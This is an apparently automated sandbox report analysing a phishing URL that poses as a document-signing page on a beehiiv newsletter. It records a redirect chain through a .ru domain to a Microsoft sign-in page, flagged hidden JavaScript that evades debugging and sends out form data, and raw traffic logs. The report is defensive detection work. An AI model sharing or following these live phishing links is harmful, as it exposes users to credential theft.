Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below

Overview

General Information

Sample URL:https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
Analysis ID:1592109
Infos:

Detection

Score:22
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1916,i,3467026499799808514,5900654251676485777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.91.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kanes-newsletter-871ead.beehiiv.com/p/plea... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script appears to be sending sensitive user data to an untrusted third-party domain, which is a strong indicator of malicious intent. Overall, this script demonstrates a high level of risk and should be treated with caution.
Source: 0.79.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-n... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some contextual factors, such as the use of jQuery and Cloudflare libraries, may suggest legitimate functionality, the overall behavior of the script is highly suspicious and warrants further investigation.
Source: 0.85.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-n... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious login page. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of credential theft or other nefarious activities.
Source: 0.86.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-n... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, and then sets up event handlers that prevent form submission and redirect the user to untrusted domains. The script also makes a GET request to a suspicious domain and then sends form data to another untrusted domain. These behaviors are highly indicative of malicious intent, such as phishing or credential theft.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Base64 decoded: 1736964871.000000
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Title: Please review and sign your document Below does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: No favicon
Source: https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&utm_medium=referral&utm_campaign=please-review-and-sign-your-document-belowHTTP Parser: No favicon
Source: https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&utm_medium=referral&utm_campaign=please-review-and-sign-your-document-belowHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26username%3dhuhuh%2540huhuhuh.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d3CDFD8807FB2F048%26opidt%3d1736964973%26uaid%3dd811912f5bba4f73bc2c1cacef83fd6e%26contextid%3d2A488B6F7CF66E05%26opignore%3d1&mkt=EN-US&uiflavor=web&username=huhuh%40huhuhuh.com&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=d811912f5bba4f73bc2c1cacef83fd6e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26username%3dhuhuh%2540huhuhuh.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d3CDFD8807FB2F048%26opidt%3d1736964973%26uaid%3dd811912f5bba4f73bc2c1cacef83fd6e%26contextid%3d2A488B6F7CF66E05%26opignore%3d1&mkt=EN-US&uiflavor=web&username=huhuh%40huhuhuh.com&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=d811912f5bba4f73bc2c1cacef83fd6e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26username%3dhuhuh%2540huhuhuh.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d3CDFD8807FB2F048%26opidt%3d1736964973%26uaid%3dd811912f5bba4f73bc2c1cacef83fd6e%26contextid%3d2A488B6F7CF66E05%26opignore%3d1&mkt=EN-US&uiflavor=web&username=huhuh%40huhuhuh.com&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=d811912f5bba4f73bc2c1cacef83fd6e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26username%3dhuhuh%2540huhuhuh.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d3CDFD8807FB2F048%26opidt%3d1736964973%26uaid%3dd811912f5bba4f73bc2c1cacef83fd6e%26contextid%3d2A488B6F7CF66E05%26opignore%3d1&mkt=EN-US&uiflavor=web&username=huhuh%40huhuhuh.com&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=d811912f5bba4f73bc2c1cacef83fd6e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: No <meta name="copyright".. found
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: No <meta name="copyright".. found
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: No <meta name="copyright".. found
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: No <meta name="copyright".. found
Source: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725616948958492.MjcwMzE0ZjgtYmNiNS00NTVmLWE2YmQtMDc4NTFiNDExNDNlZWRkZjFmODMtODc4MS00ZWIxLTgyNzktYjk5YmQyZmRhN2Yz&ui_locales=en-US&mkt=en-US&client-request-id=d811912f-5bba-4f73-bc2c-1cacef83fd6e&state=jlGjuVkorIQb3bFYNFG_Rx1vYEr6jhsoVvAG13o-iw3VAA7Ss8MmOVTSzCTRbiK2Esw_rPS22Kw8i7LhuWPZbiydyYmtbo7vE3HQV45wGWDbOkeb2ADsJrbEGUt2Pe-sX-oCuRnqoeIZOwBGUYDPrjCiQrgQxpBDJjokIAouKmWqPeXh_gUOHTeSaSqspm6qn1HuvdbOkoEB7h4q5vSkLjaZv5RBr4nHacjTTGXme2bPDD9w5B3xcNIwWOO9v2ZMiDTFUTSPs6OGRjDpGUKalQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /p/please-review-and-sign-your-document-below HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/manifest-bfc7ba9e.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
